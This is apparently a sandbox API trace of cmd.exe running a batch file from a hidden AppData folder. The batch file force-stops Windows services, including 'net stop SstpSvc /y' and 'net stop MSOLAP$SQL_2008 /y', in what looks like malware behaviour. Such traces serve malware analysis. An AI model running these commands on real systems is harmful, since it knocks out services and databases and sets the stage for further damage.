[0040.402] GetProcessHeap () returned 0x3e0000 [0040.402] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0040.403] GetProcessHeap () returned 0x3e0000 [0040.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0040.403] _get_osfhandle (_FileHandle=3) returned 0x78 [0040.403] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5c5 [0040.403] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x12fc, lpOverlapped=0x0) returned 1 [0040.403] SetFilePointer (in: hFile=0x78, lDistanceToMove=1498, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5da [0040.403] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SstpSvc /y\r\n\r\nstem RecoveryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 21 [0040.403] _get_osfhandle (_FileHandle=3) returned 0x78 [0040.403] GetFileType (hFile=0x78) returned 0x1 [0040.404] _get_osfhandle (_FileHandle=3) returned 0x78 [0040.404] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5da [0040.404] GetProcessHeap () returned 0x3e0000 [0040.404] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0040.404] GetProcessHeap () returned 0x3e0000 [0040.404] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0040.404] _tell (_FileHandle=3) returned 1498 [0040.404] _close (_FileHandle=3) returned 0 [0040.404] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0040.404] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0040.404] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0040.404] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0040.404] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0040.404] _wcsicmp (_String1="net", _String2="CD") returned 11 [0040.404] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0040.404] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0040.405] _wcsicmp (_String1="net", _String2="REN") returned -4 [0040.405] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0040.405] _wcsicmp (_String1="net", _String2="SET") returned -5 [0040.405] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0040.405] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0040.405] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0040.405] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0040.405] _wcsicmp (_String1="net", _String2="MD") returned 1 [0040.405] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0040.405] _wcsicmp (_String1="net", _String2="RD") returned -4 [0040.405] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0040.405] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0040.405] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0040.405] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0040.405] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0040.405] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0040.405] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0040.405] _wcsicmp (_String1="net", _String2="VER") returned -8 [0040.405] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0040.405] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0040.405] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0040.405] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0040.405] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0040.405] _wcsicmp (_String1="net", _String2="START") returned -5 [0040.405] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0040.405] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0040.405] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0040.405] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0040.405] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0040.405] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0040.405] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0040.405] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0040.405] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0040.405] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0040.406] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0040.406] SetErrorMode (uMode=0x0) returned 0x1 [0040.406] GetProcessHeap () returned 0x3e0000 [0040.406] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0040.406] GetProcessHeap () returned 0x3e0000 [0040.406] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0040.406] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.406] GetProcessHeap () returned 0x3e0000 [0040.406] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0040.406] GetProcessHeap () returned 0x3e0000 [0040.406] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0040.406] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0040.406] GetProcessHeap () returned 0x3e0000 [0040.406] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0040.406] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.406] GetProcessHeap () returned 0x3e0000 [0040.406] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0040.406] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0040.406] GetProcessHeap () returned 0x3e0000 [0040.406] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0040.406] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.406] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.406] GetLastError () returned 0x2 [0040.407] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.407] GetLastError () returned 0x2 [0040.407] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.407] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0040.407] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0040.407] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.407] GetLastError () returned 0x2 [0040.407] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0040.407] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0040.407] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.407] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0040.407] SetErrorMode (uMode=0x0) returned 0x1 [0040.408] GetProcessHeap () returned 0x3e0000 [0040.408] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0040.408] GetProcessHeap () returned 0x3e0000 [0040.408] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0040.408] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.408] GetProcessHeap () returned 0x3e0000 [0040.408] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0040.408] GetProcessHeap () returned 0x3e0000 [0040.408] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0040.408] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0040.408] GetProcessHeap () returned 0x3e0000 [0040.408] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0040.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.408] GetProcessHeap () returned 0x3e0000 [0040.408] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0040.408] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0040.408] GetProcessHeap () returned 0x3e0000 [0040.408] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0040.408] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.408] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.408] GetLastError () returned 0x2 [0040.408] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.408] GetLastError () returned 0x2 [0040.408] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.409] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0040.409] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0040.409] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.409] GetLastError () returned 0x2 [0040.409] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0040.409] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0040.409] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.409] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0040.409] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0040.409] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0040.409] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0040.409] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SstpSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SstpSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SstpSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x3b0, dwThreadId=0x7bc)) returned 1 [0040.412] CloseHandle (hObject=0x78) returned 1 [0040.412] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0040.413] GetProcessHeap () returned 0x3e0000 [0040.413] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.413] GetEnvironmentStringsW () returned 0x3f8408* [0040.413] GetProcessHeap () returned 0x3e0000 [0040.413] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.413] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.413] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0040.649] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0040.650] CloseHandle (hObject=0x74) returned 1 [0040.650] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0040.650] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0040.650] GetProcessHeap () returned 0x3e0000 [0040.650] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.650] GetEnvironmentStringsW () returned 0x3f8408* [0040.650] GetProcessHeap () returned 0x3e0000 [0040.650] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.650] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.650] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0040.650] GetProcessHeap () returned 0x3e0000 [0040.650] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.650] GetEnvironmentStringsW () returned 0x3f8408* [0040.650] GetProcessHeap () returned 0x3e0000 [0040.650] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.650] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.650] GetProcessHeap () returned 0x3e0000 [0040.650] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0040.650] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0040.650] _get_osfhandle (_FileHandle=1) returned 0x264 [0040.650] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0040.650] _get_osfhandle (_FileHandle=1) returned 0x264 [0040.651] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0040.651] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0040.651] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0040.651] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0040.651] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0040.651] SetConsoleInputExeNameW () returned 0x1 [0040.651] GetConsoleOutputCP () returned 0x1b5 [0040.651] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0040.651] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0040.652] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0040.652] _get_osfhandle (_FileHandle=3) returned 0x74 [0040.652] SetFilePointer (in: hFile=0x74, lDistanceToMove=1498, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5da [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0040.652] GetProcessHeap () returned 0x3e0000 [0040.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0040.653] _get_osfhandle (_FileHandle=3) returned 0x74 [0040.653] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5da [0040.653] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x12e7, lpOverlapped=0x0) returned 1 [0040.653] SetFilePointer (in: hFile=0x74, lDistanceToMove=1527, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f7 [0040.653] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSOLAP$SQL_2008 /y\r\necoveryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 29 [0040.653] _get_osfhandle (_FileHandle=3) returned 0x74 [0040.653] GetFileType (hFile=0x74) returned 0x1 [0040.653] _get_osfhandle (_FileHandle=3) returned 0x74 [0040.653] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f7 [0040.653] GetProcessHeap () returned 0x3e0000 [0040.653] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0040.653] GetProcessHeap () returned 0x3e0000 [0040.653] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0040.653] _tell (_FileHandle=3) returned 1527 [0040.654] _close (_FileHandle=3) returned 0 [0040.654] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0040.654] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0040.654] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0040.654] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0040.654] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0040.654] _wcsicmp (_String1="net", _String2="CD") returned 11 [0040.654] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0040.654] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0040.654] _wcsicmp (_String1="net", _String2="REN") returned -4 [0040.654] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0040.654] _wcsicmp (_String1="net", _String2="SET") returned -5 [0040.654] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0040.654] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0040.654] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0040.654] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0040.654] _wcsicmp (_String1="net", _String2="MD") returned 1 [0040.654] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0040.654] _wcsicmp (_String1="net", _String2="RD") returned -4 [0040.654] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0040.654] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0040.654] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0040.654] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0040.654] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0040.654] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0040.654] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0040.654] _wcsicmp (_String1="net", _String2="VER") returned -8 [0040.654] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0040.654] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0040.654] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0040.654] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0040.655] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0040.655] _wcsicmp (_String1="net", _String2="START") returned -5 [0040.655] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0040.655] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0040.655] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0040.655] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0040.655] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0040.655] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0040.655] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0040.655] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0040.655] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0040.655] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0040.655] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0040.655] SetErrorMode (uMode=0x0) returned 0x1 [0040.655] GetProcessHeap () returned 0x3e0000 [0040.655] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0040.655] GetProcessHeap () returned 0x3e0000 [0040.655] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, 